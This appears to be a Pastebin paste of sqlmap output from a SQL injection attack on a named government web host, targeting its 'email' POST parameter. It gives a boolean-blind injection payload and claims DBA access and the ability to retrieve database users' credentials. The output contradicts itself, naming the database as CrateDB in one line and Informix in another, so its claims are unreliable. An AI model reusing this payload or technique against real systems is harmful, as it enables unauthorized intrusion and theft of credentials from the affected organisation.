Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- POST https://wft.sec.gov
- POST data: email=&email=
- Edit POST data [default: email=&email=] (Warning: blank fields detected): email=&email=
- [23:25:55] [CRITICAL] WAF/IPS identified as 'Kona Site Defender (Akamai Technologies)'
- it looks like the back-end DBMS is 'CrateDB'.
- POST parameter 'email' is vulnerable.
- sqlmap identified the following injection point(s) with a total of 358 HTTP(s) requests:
- ---
- Parameter: email (POST)
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause
- Payload: email=sIUT&email=-7716 OR 2100=2100
- ---
- web application technology: Nginx
- back-end DBMS: Informix
- current user is DBA: True
- [23:31:01] [SQL-Blind] able to retrieve the credentials of database users
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement